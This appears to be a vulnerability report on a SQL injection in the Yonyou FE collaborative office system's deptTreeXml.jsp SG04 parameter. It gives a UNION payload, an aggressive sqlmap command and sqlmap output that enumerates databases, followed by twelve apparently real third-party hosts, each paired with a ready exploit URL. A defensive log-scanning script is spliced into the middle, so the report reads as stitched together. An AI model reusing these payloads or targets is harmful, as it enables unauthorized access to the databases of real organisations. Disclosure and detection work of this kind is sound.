Vulnerability Details

A parameter in the Yonyou FE collaborative office system (用友FE协作办公系统) is insufficiently filtered, resulting in a SQL injection vulnerability that can be exploited directly with UNION injection.

Injection URL: /system/config/deptTreeXml.jsp?type=group&SG04=1

Injected parameter: SG04

Payload: SG04=1'+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

Sqlmap injection: python sqlmap.py -u 'http://xxxx/system/config/deptTreeXml.jsp?type=group&SG04=1' -p SG04 --dbms mssql --level 5 --risk 3 --technique=U --union-cols=24 --dbs  --threads 10 --batch -v 1
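For defenders, the practical value of this report is the signature it gives: the vulnerable endpoint, the parameter, and the fact that SG04 is expected to be a plain numeric id. The following Python script is an added example (not code from the report or from Yonyou) that scans web-server access log lines for this endpoint, decodes the SG04 value, and flags requests whose value is not a bare integer, with the matched SQL token as the reason. It handles both encodings seen in the report (a raw `'` and `%27`, with `+` for spaces), which collapse to the same decoded value. The log format, path constant and sample log lines are assumptions constructed for the example.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Assumed combined-log style request line; adjust LOG_RE for your server's format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
VULN_PATH = "/system/config/deptTreeXml.jsp"   # endpoint named in the report
PARAM = "SG04"                                 # injected parameter named in the report
# Tokens that should never appear in a numeric id: quotes, UNION/SELECT, @@vars, comment markers.
INJ_RE = re.compile(r"(['\"]|\bunion\b|\bselect\b|@@\w+|--|/\*)", re.IGNORECASE)

# Constructed sample log (not from the report): one benign request, the raw-quote and
# %27-encoded payload shapes shown in the report, and one unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2015:09:59:15 +0800] "GET /system/config/deptTreeXml.jsp?type=group&SG04=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2015:09:59:16 +0800] "GET /system/config/deptTreeXml.jsp?type=group&SG04=1'+UNION+ALL+SELECT+1,@@version,1,1 HTTP/1.1" 200 812
10.0.0.9 - - [01/Jan/2015:09:59:17 +0800] "GET /system/config/deptTreeXml.jsp?type=group&SG04=1%27+UNION+ALL+SELECT+1,@@version,1,1-- HTTP/1.1" 200 812
10.0.0.7 - - [01/Jan/2015:09:59:18 +0800] "GET /index.jsp HTTP/1.1" 200 100
"""


def inspect_sg04(decoded_value: str) -> Optional[str]:
    """Return a reason string if the decoded SG04 value is anomalous, else None.

    A legitimate department/group id is a bare integer; anything else is reported,
    and the first SQL-looking token (if any) is named so an analyst can triage quickly.
    """
    if decoded_value.isdigit():
        return None
    m = INJ_RE.search(decoded_value)
    if m:
        return f"SQL token {m.group(0)!r} in {PARAM}"
    return f"non-numeric {PARAM} value"


def scan_log(text: str) -> List[Dict[str, str]]:
    """Scan access-log text and return one finding per anomalous SG04 value."""
    findings: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != VULN_PATH:
            continue
        # parse_qs percent-decodes and turns '+' into a space, so "1'+UNION" and
        # "1%27+UNION" both become "1' UNION" before inspection.
        for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
            reason = inspect_sg04(value)
            if reason:
                findings.append(
                    {"ip": m.group("ip"), "ts": m.group("ts"), "value": value, "reason": reason}
                )
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['reason']}: {f['value']}")
```

Run it against real logs by feeding the file contents to `scan_log`. The same "must be an integer" rule is what the application should enforce at the input boundary; the durable fix is to bind SG04 as a parameter of a prepared statement rather than concatenating it into the query, so that a quote in the value can no longer change the statement's structure.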

Proof of vulnerability:

(1)http://oa.hzuf.com:9090

http://oa.hzuf.com:9090/system/config/deptTreeXml.jsp?type=group&SG04=1'+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

1.png

Sqlmap injection:

$ python sqlmap.py -u 'http://oa.hzuf.com:9090/system/config/deptTreeXml.jsp?type=group&SG04=1' -p SG04 --dbms mssql --level 5 --risk 3 --technique=U --dbs  --threads 10 --batch -v 1

---

Place: GET

Parameter: SG04

    Type: UNION query

    Title: Generic UNION query (NULL) - 24 columns

    Payload: type=group&SG04=1' UNION ALL SELECT 32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,CHAR(113)+CHAR(97)+CHAR(109)+CHAR(98)+CHAR(113)+CHAR(106)+CHAR(99)+CHAR(107)+CHAR(76)+CHAR(86)+CHAR(79)+CHAR(71)+CHAR(90)+CHAR(80)+CHAR(87)+CHAR(113)+CHAR(104)+CHAR(111)+CHAR(101)+CHAR(113),32,32,32,32,32,32,32,32--

---

[09:59:15] [INFO] testing Microsoft SQL Server

[09:59:15] [INFO] confirming Microsoft SQL Server

[09:59:15] [INFO] the back-end DBMS is Microsoft SQL Server

web application technology: Servlet 2.4, Tomcat 4.0.4., JSP

back-end DBMS: Microsoft SQL Server 2005

[09:59:15] [INFO] fetching database names

available databases [11]:

[*] FE_APP5

[*] FE_BASE5

[*] FE_ERP

[*] master

[*] model

[*] msdb

[*] ncdb

[*] oa

[*] ReportServer

[*] ReportServerTempDB

[*] tempdb

1.png

(2)http://220.168.210.109:9090

http://220.168.210.109:9090/system/config/deptTreeXml.jsp?type=group&SG04=1'+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

2.png

(3)http://119.145.194.122:9090

http://119.145.194.122:9090/system/config/deptTreeXml.jsp?type=group&SG04=1'+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

3.png

(4)http://fsd2014.f3322.org:9090/

http://fsd2014.f3322.org:9090/system/config/deptTreeXml.jsp?type=group&SG04=1'+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

4.png

(5)http://oa.chnjcdc.com:9090

http://oa.chnjcdc.com:9090/system/config/deptTreeXml.jsp?type=group&SG04=1'+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

5.png

(6)http://120.237.156.46:8088/

http://120.237.156.46:8088/system/config/deptTreeXml.jsp?type=group&SG04=1'+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

1.png

(7)http://ai-oa.allan.com.cn:9090/

http://ai-oa.allan.com.cn:9090/system/config/deptTreeXml.jsp?type=group&SG04=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

1.png

(8)http://183.129.249.246:9090

http://183.129.249.246:9090/system/config/deptTreeXml.jsp?type=group&SG04=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

1.png

(9)http://218.205.208.22:9090

http://218.205.208.22:9090/system/config/deptTreeXml.jsp?type=group&SG04=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

1.png

(10)http://120.196.116.3:7321

http://120.196.116.3:7321/system/config/deptTreeXml.jsp?type=group&SG04=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

1.png

(11)http://fe.hy-la.com:8088

http://fe.hy-la.com:8088/system/config/deptTreeXml.jsp?type=group&SG04=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

1.png

(12)http://220.168.210.109:9090

http://220.168.210.109:9090/system/config/deptTreeXml.jsp?type=group&SG04=1%27+UNION+ALL+SELECT+1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--

1.png